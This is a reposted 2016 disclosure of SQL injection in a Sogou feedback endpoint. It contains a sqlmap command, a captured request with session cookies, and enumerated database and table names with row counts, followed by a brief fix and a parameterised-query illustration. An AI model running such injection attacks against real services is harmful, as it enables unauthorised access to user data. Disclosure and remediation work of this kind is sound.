
SQL injection in a Sogou endpoint leaks 220k users' information

2016-06-30 23:30

As in the title.


Captured the requests made by http://fankui.help.sogou.com/index.php/web/web/index?type=6 and found that appending a single quote to a field triggers a database error. Things like this are hard to guard against.

[Screenshot: 111.png]


sqlmap syntax: sqlmap.py -r 1.txt --dbs
---------------- Request packet -------
POST /index.php/web/web/addShenSu HTTP/1.1
Host: fankui.help.sogou.com
Proxy-Connection: keep-alive
Content-Length: 120
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://fankui.help.sogou.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fankui.help.sogou.com/index.php/web/web/index?type=6
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SUV=00D41AA9DE4930F75734A445360CE715; SNUID=465E0E96474D7AE00298446D48C4D629; SUID=0E1649DE2208990A000000005734A933; m=45390C4EEF5AF7959CC32A4FFB401114; GOTO=Af99046; [email protected]@@@@@@@@@@; YYID=45390C4EEF5AF7959CC32A4FFB401114; LSTMV=320%2C69; LCLKINT=1145; usid=eJINqnJQY9tgFkkg; IPLOC=CN3302; PHPSESSID=bh2gtfs2om3k7a19bom6okc260

Shensu%5BwebAdr%5D=http%3A%2F%2Fwww.sogou.com%2F&Shensu%5Breason%5D=1&Shensu%5Bcontact%5D=313%40q.com&webContactWayType=



Database information
available databases [3]:
[*] information_schema
[*] sogou_zhanzhang
[*] test

Tables in the current database
Database: sogou_zhanzhang
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| deadlink_wap_data | 15191050 |
| url_submit | 547950 |
| url_submit_view | 547950 |
| website | 270697 |
| website_view | 270697 |
| `user` | 220754 |
| sitemap | 175918 |
| sitemap_copy | 175417 |
| sitemap_view | 168249 |
| site_name | 73232 |
| website_precision | 67856 |
| site_name_view | 65060 |
| fault_block_log | 54773 |
| sitemap_wap | 52806 |
| fault_block | 51056 |
| sitemap_wap_view | 48773 |
| sitemap_invitation | 45320 |
| sitemap_invitation_view | 43771 |
| site_icon | 42416 |
| site_icon_view | 42067 |
| spider_pressure_feedback | 31070 |
| sitemap_invitation_log | 28583 |
| site_logo | 27750 |
| site_logo_view | 25608 |
| site_name_log | 24155 |
| spider_pressure_feedback_view | 23755 |
| web2wap | 20046 |
| web2wap_view | 19268 |
| site_logo_log | 17607 |
| renzheng_log | 16555 |
| supply_fetch | 14501 |
| site_icon_log | 13925 |
| renzheng | 9324 |
| fb_updateshensu | 5427 |
| fb_shensu | 5341 |
| web2wap_log | 4917 |
| fb_img | 3720 |
| redirection | 3696 |
| redirection_view | 3696 |
| tb_member | 3682 |
| feedback | 3270 |
| fb_tool | 2906 |
| feedback_view | 2773 |
| url_shoulu | 2577 |
| umis_waitingfavicon_log | 2568 |
| umis_waitingfavicon | 2520 |
| site_param | 1992 |
| sitemap_blacklist | 1917 |
| site_param_view | 1825 |
| website_precision_log | 1064 |
| user_change_log | 968 |
| redirection_log | 561 |
| fb_suggestion | 289 |
| fb_jubao | 201 |
| fb_record | 153 |
| renzheng_set | 106 |
| fb_kuaizhao | 81 |
| mail_view | 78 |
| backend_user | 74 |
| website_log | 63 |
| product_black_list | 24 |
| user_invitation | 19 |
| notice | 18 |
| fb_updatetool | 14 |
| website_precision_maxid | 7 |
| columnist | 5 |
| partner_white_list | 5 |
| mail_group | 1 |
| site_param_log | 1 |
+-------------------------------+---------+

Solution:

Filter the input.
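The report's remediation is that one word. As an added illustration that is not Sogou's code and not part of the original report, the following shows the concatenation pattern that explains the quote-triggered error, next to a parameterised replacement. It uses sqlite3 with a constructed table named after the fb_shensu table in the dump; the schema and function names are assumptions.

```python
import sqlite3

# Constructed example (not Sogou's code). The feedback form in the captured
# request posts Shensu[webAdr], Shensu[reason] and Shensu[contact]; the table
# name fb_shensu is taken from the dumped table list, its columns are assumed.
SCHEMA = ("CREATE TABLE fb_shensu (id INTEGER PRIMARY KEY, "
          "webAdr TEXT, reason INTEGER, contact TEXT)")


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def add_shensu_vulnerable(conn, form):
    # String concatenation: any quote in a field becomes part of the SQL text,
    # which is why a stray "'" makes the database raise a syntax error.
    sql = ("INSERT INTO fb_shensu (webAdr, reason, contact) "
           "VALUES ('%s', %s, '%s')"
           % (form["webAdr"], form["reason"], form["contact"]))
    conn.execute(sql)
    conn.commit()


def add_shensu_fixed(conn, form):
    # Parameterised query: values travel separately from the statement, so a
    # quote in `contact` is stored as data and never parsed as SQL syntax.
    # int() also rejects a non-numeric `reason` before it reaches the database.
    conn.execute("INSERT INTO fb_shensu (webAdr, reason, contact) VALUES (?, ?, ?)",
                 (form["webAdr"], int(form["reason"]), form["contact"]))
    conn.commit()


def try_submit(handler, form):
    """Run one submission on a fresh DB; return ('ok', stored_contact) or ('error', msg)."""
    conn = new_db()
    try:
        handler(conn, form)
    except sqlite3.Error as e:
        return ("error", str(e))
    row = conn.execute("SELECT contact FROM fb_shensu").fetchone()
    return ("ok", row[0])


# Decoded form body from the captured request, and the single-quote probe the report mentions.
CLEAN = {"webAdr": "http://www.sogou.com/", "reason": "1", "contact": "313@q.com"}
PROBE = dict(CLEAN, contact="313@q.com'")
```

With the concatenated version the clean body is stored but the probe fails with a database error; with the parameterised version the probe is stored verbatim and no error surfaces.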

Source: www.2cto.com/Article/201606/521259.html

Reads: 475486 | Comments: 0 | Tags: injection
